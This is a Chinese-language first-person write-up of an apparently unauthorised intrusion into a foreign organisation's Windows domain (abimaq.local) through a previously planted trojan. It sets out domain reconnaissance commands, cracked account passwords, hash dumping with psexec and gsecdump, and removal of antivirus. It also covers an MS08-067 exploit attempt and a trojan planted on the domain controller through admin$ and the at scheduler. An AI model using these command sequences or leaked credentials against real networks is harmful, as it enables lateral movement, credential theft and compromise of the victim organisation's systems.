10、一篇經典的域滲透文章

最近在整理資料時發現一些滲透筆記，於是翻開看看，原來有一個老外的內部網還沒有拿下。當時已經給內網的一臺機器種植了木馬，反正閒著沒事就拿它來練練手吧。開啟遠端居然肉雞還在，廢話就不多說了，下面開始吧。 首先來看看已經控制的這臺電腦在內網中充當什麼角色，並收集一些常規的資訊。執行ipconfig /all(如圖1)

從 這裡我們可以看出，此計算機名為abimaq6，ip地址是172.16.16.139。子網掩碼為255.255.240.0、閘道器172.16.16.1、DNS伺服器分別是172.16.16.2和172.16.16.3。還有一個重要的就是這臺機器於域管理模式中，所在域為abimaq.local。

既然是域結構，再來獲取一下域使用者列表，執行net user /domain命令(如圖2)。該命令可顯示所有的域使用者名稱單。看來域使用者還真多。

再來看看這個內網中到底存在多少個域，要是處於多域狀態滲透是比較麻煩的。再執行net view /domain看看這個內網存在多少個域(如圖3)。從結果可知這個內網只有ABIMAQ這個域。

現在知道這個內網只有一個域，還知道域使用者。我們現在要做的事情就是要獲取域當中的管理員列表，因為上面獲取的是全部使用者資訊，包括一般使用者跟管理員。這裡要獲取域管理員列表可以使用net group "domain admins" /domain命令(如圖4)。

要是你還想獲取某使用者的詳細資訊的話，可以使用net user 域使用者 /domain命令獲取。
獲取了上面的資訊之後還是先彆著急進行攻擊，要真正滲透一個內網需要獲取的資訊還有很多的。再來刺探一下內網的機器分佈狀況。執行net view命令，列出內網中的計算機(如圖5)。

由計算機名跟備註很容易看出此計算機的用途，圖中我左了相關注釋。例如計算名為abimaq01這個機器，備註為servidor master ad，以這個命名看，估計這臺就是域伺服器了。一般情況下，域伺服器跟DNS伺服器都是同一臺機器的，這裡我們來驗證一下。這裡用nbtstat命令，執 行nbtstat -a abimaq01(如圖6,圖是本機抓的)。

如果命令執行的成的話，就可以通過計算機名獲取相應ip的。
除了nbtstat命令之外，其實ping命令也可以實現的。執行ping abimaq01(如圖7)。

很容易看出abimaq01的IP就是172.16.16.2，這裡只能說明這個是DNS伺服器。要證明DNS伺服器跟域伺服器是否是同一個機器，還需要執行ping abimaq.local名判斷域伺服器的IP地址(如圖8)。

通過返回資訊可知，證實這裡的DNS伺服器跟域伺服器是同一臺機器。
現在再回過頭來看看這臺機器與內網中的哪些機器通訊，執行arp -a(如圖9)。

既然域伺服器有共享資料夾，我們可以查詢可寫目錄然後給檔案捆綁木馬，這樣就能控制其他電腦了。嘗試把DC上的共享資料夾對映到本地F盤，試著建立一個資料夾，提示沒有許可權(如圖12)

一 般都是沒許可權的了，有些目錄是有許可權寫的，但是那些沒有用途，那些只是對當前使用者有效，就是域伺服器給你分配的這個使用者的。上傳抓HASH工具，抓圖本地 HASH，然後通過彩虹表破解其密碼可得一下賬號密碼資訊：Administrator  km3h7ikill   kill51888dookie  dookie1savsak  savsakmadking  112121zdzws   56649223amsonhsx  Hsx1314520
得到上面資訊是非常有用的，既然上面已經獲取域管理員存在一個administrator賬號，這裡就用psexec.exe和gsecdump.exe抓取HASH。

執行psexec.exe -s -u administrator -p km3h7i \\172.16.16.2 -c c:\kav\gsecdump.exe -u(圖13)。

哈 哈。把HASH抓出來了，看來RP還是不錯。繼續丟去用彩虹表跑密碼，結果如下：ABIMAQ\Administrator密 碼：k78m90ABIMAQ\MonitorMagicSvcAccnt密碼：.......HS58Y7ABIMAQ\ABIMAQ6$破解失敗
既然得到密碼，就讓它執行遠端木馬：psexec.exe -s -u administrator -p k78m90 \\172.16.16.2 -c c:\kav\2009.exe(如圖14)

這下奇怪了，上線的不是172.16.16.2，而是執行命令的那臺機器，重複上線了。（如圖15）

這下可鬱悶了。於是想嘗試一下ms08067對其他機器進行溢位，上傳S掃描器上去，掃描開放445埠的機器。執行s.exe tcp 172.16.16.2 172.16.16.254 445 512 /save，掃描結果如圖16。

結 果反彈不出來，估計是路由器做了策略了。至於為什麼我的遠端為什麼能連線，因為我的木馬配置是用80埠的，一般會禁用這個埠通訊的。無奈之下，只能把 防毒軟體刪除掉，當時我真是氣死了。然後再用ms08-067.exe進行溢位，結果毫無收穫，要不是打上補丁，要不就是把相關服務停止了。
搞這 個域伺服器真是不那麼容易啊，一般內網入侵用得最多的就是net use命令，這裡還是用它。執行net use \\172.16.16.2\IPC$ "k78m90" /user:"admintitrator"建立ipc$連線，結果提示1219錯誤(如圖19)。

★ 錯誤號分析原因：
錯誤號5，拒絕訪問：很可能你使用的使用者不是管理員許可權的，先提升許可權；
錯誤號51，Windows無法找到網路路徑：網路有問題；
錯誤號53，找不到網路路徑：ip地址錯誤；目標未開機；目標lanmanserver服務未啟動；目標有防火牆（埠過濾）；
錯誤號67，找不到網路名：你的lanmanworkstation服務未啟動或者目標刪除了ipc$；
錯誤號1219，提供的憑據與已存在的憑據集衝突：你已經和對方建立了一個ipc$，請刪除再連；
錯誤號1326，未知的使用者名稱或錯誤密碼：原因很明顯了；
錯誤號1792，試圖登入，但是網路登入服務沒有啟動：目標NetLogon服務未啟動；
錯誤號2242，此使用者的密碼已經過期：目標有帳號策略，強制定期要求更改密碼
★既然提示要先刪除現有的ipc$連線再連，就執行net use * /del /yes把全部連線刪除吧。再次執行net use \\172.16.16.2\IPC$ "k78m90" /user:"admintitrator"又提示錯誤號1312，這下可更加鬱悶了，經驗告訴我們
錯誤號1312，是許可權不夠造成的。繼續執行net use \\172.16.16.2\IPC$ "k78m90" /user:"aABIMAQ\Administrator" 命令(如圖20)，終於成功了。

細 心的朋友可能會發現上述兩句的使用者不同，為什麼不同會導致兩個結果的。在此期間請教LCX大牛得知某些域需要新增域名的，有些則不需要。接下來就好辦了， 就是複製木馬過去執行，執行copy 2009.exe \\172.16.16.2\admin$命令(如圖21)。

用net time \\172.16.16.2命令(如圖22)檢視一下遠端機器的時間，準備用AT命令計劃一個任務讓遠端機器執行木馬。

於是執行at \\172.16.16.2 1:40 2009.exe命令在遠端機器建立一個任務(如圖23)

等 了幾分鐘都上線不了。有可能是複製過去不成功，也有可能被殺，同樣也有可能是任務沒有執行。結果檢視任務還在處理中，沒有執行，這是因為執行時間還沒有 到，霎時暈倒！建議還是用24小時制來操作，這樣就不會錯了。繼續執行at \\172.16.16.2 13:50 2009.exe 命令就能上線了。
現在拿下域伺服器了，肯定也要控制其他機器才過癮的，習慣上執行arp -a 看看本計算機會話情況。如圖24。結果真的嚇一跳，不單單是172.16.16.X這段，還有172.16.18.X、172.16.19.X、172.16.20.X。內網可真不小啊！